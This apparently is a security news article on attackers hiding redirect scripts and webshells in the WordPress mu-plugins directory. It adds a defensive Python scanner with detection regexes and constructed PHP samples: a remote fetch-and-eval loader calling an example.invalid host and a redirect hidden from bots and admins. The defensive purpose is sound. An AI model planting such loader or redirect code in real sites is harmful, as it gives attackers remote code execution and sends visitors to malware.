Hackers are abusing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page load while evading detection.

The technique was first observed by security researchers at Sucuri in February 2025, but adoption is on the rise, with threat actors now using the folder to run three distinct types of malicious code.

"The fact that we've seen so many infections inside mu-plugins suggests that attackers are actively targeting this directory as a persistent foothold," explains Sucuri security analyst Puja Srivastava.

Must-Use Plugins (mu-plugins) are a special type of WordPress plugin that execute automatically on every page load without needing to be activated in the admin dashboard. They are PHP files stored in the 'wp-content/mu-plugins/' directory, and they are not listed on the regular "Plugins" admin page unless the "Must-Use" filter is selected.

Mu-plugins have legitimate use cases, such as enforcing site-wide functionality (custom security rules, performance tweaks) or dynamically modifying variables or other code.

However, because mu-plugins run on every page load and don't appear in the standard plugin list, they can be used to stealthily carry out a wide range of malicious activity, such as stealing credentials, injecting malicious code, or altering HTML output.

Sucuri has discovered three payloads that attackers are planting in the mu-plugins directory, apparently as part of financially motivated operations. One of them, redirect.php, redirects visitors (excluding bots and logged-in admins) to a malicious website (updatesnow[.]net) that displays a fake browser update prompt to trick them into downloading malware.

Another of the payloads is a webshell, which is particularly dangerous as it allows the attackers to remotely execute commands on the server, steal data, and launch downstream attacks on members and visitors.

Sucuri has not determined the exact infection pathway but hypothesizes that attackers exploit known vulnerabilities in plugins and themes, or weak admin account credentials.

WordPress site admins are advised to apply security updates to their plugins and themes, disable or uninstall those that aren't needed, and protect privileged accounts with strong credentials and multi-factor authentication.

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
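The check a practitioner would want after reading the above is a way to triage what is actually sitting in wp-content/mu-plugins/. The scanner below is an added example, not Sucuri's tooling and not code from the article: it walks the directory, flags PHP files showing the behaviours described (a redirect gated on bot or logged-in-user checks, code fetched from a remote URL and executed, common obfuscation calls) and, more importantly, flags any file that is not on an admin-maintained allowlist. The regex indicators are my own heuristics, the sample files are constructed stand-ins (only the name redirect.php comes from the article; loader.php, disable-xmlrpc.php and the example.invalid URLs are assumptions), and none of it is the real malware.

```python
"""Triage scanner for the WordPress mu-plugins directory (added example)."""
from __future__ import annotations

import os
import re
import tempfile

# Heuristic indicators for the behaviours the article describes.
# Assumption: these are my own triage patterns, not Sucuri's signatures.
REMOTE_FETCH = re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I)
DYNAMIC_EXEC = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
OBFUSCATION = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
REDIRECT = re.compile(r"\bwp_redirect\s*\(|header\s*\(\s*['\"]Location:", re.I)
# Gating that hides a redirect from admins and crawlers, as redirect.php does.
GATING = re.compile(r"is_user_logged_in|current_user_can|HTTP_USER_AGENT|\b(bot|crawl|spider)\b", re.I)


def scan_file(source: str) -> list[str]:
    """Return the indicator tags that match one PHP source file."""
    findings: list[str] = []
    if REMOTE_FETCH.search(source) and DYNAMIC_EXEC.search(source):
        findings.append("remote-code-loader")   # fetch-then-execute, webshell-style
    elif DYNAMIC_EXEC.search(source):
        findings.append("dynamic-exec")
    if OBFUSCATION.search(source):
        findings.append("obfuscation")
    if REDIRECT.search(source) and GATING.search(source):
        findings.append("conditional-redirect")  # redirect that skips bots/admins
    return findings


def scan_mu_plugins(mu_dir: str, allowlist: frozenset[str] = frozenset()) -> dict[str, list[str]]:
    """Scan every .php file under mu_dir; return {relative path: [tags]} for files worth a look.

    WordPress auto-loads only the top-level .php files in mu-plugins, but a
    top-level loader can include anything nested below it, so subdirectories
    are walked too. A file not on the allowlist is reported even with no
    pattern hits: the allowlist, not the regexes, is the real control.
    """
    results: dict[str, list[str]] = {}
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            rel = os.path.relpath(path, mu_dir)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_file(fh.read())
            if rel not in allowlist:
                findings.append("not-in-allowlist")
            if findings:
                results[rel] = findings
    return results


# Constructed sample files (assumption: stand-ins, not the actual payloads).
SAMPLE_FILES = {
    # A benign site-wide tweak a developer would legitimately keep here.
    "disable-xmlrpc.php": "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n",
    # Mimics the redirect.php behaviour: only non-bot, non-logged-in visitors go.
    "redirect.php": (
        "<?php\n"
        "add_action('init', function () {\n"
        "    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';\n"
        "    if (is_user_logged_in() || preg_match('/bot|crawl|spider/i', $ua)) { return; }\n"
        "    wp_redirect('https://example.invalid/update');\n"
        "    exit;\n"
        "});\n"
    ),
    # Fetch-and-execute loader standing in for the webshell case (hypothetical name).
    "loader.php": (
        "<?php\n"
        "$code = file_get_contents('https://example.invalid/payload.txt');\n"
        "eval(base64_decode($code));\n"
    ),
}


def demo() -> dict[str, list[str]]:
    """Write the constructed samples into a temporary mu-plugins dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        mu_dir = os.path.join(tmp, "wp-content", "mu-plugins")
        os.makedirs(mu_dir)
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_mu_plugins(mu_dir, allowlist=frozenset({"disable-xmlrpc.php"}))


if __name__ == "__main__":
    for rel, tags in sorted(demo().items()):
        print(f"{rel}: {', '.join(tags)}")
```

Point `scan_mu_plugins()` at a real install's wp-content/mu-plugins/ with an allowlist of the files you deployed yourself, and cross-check the result against `wp plugin list --status=must-use`. The regexes will hit legitimate code too (a real redirect plugin gates on `is_user_logged_in` as well), so treat them as prompts to read the file; the finding that matters on its own is any .php file in that directory you cannot account for.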
This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 31 Mar 2025 17:10:16 +0000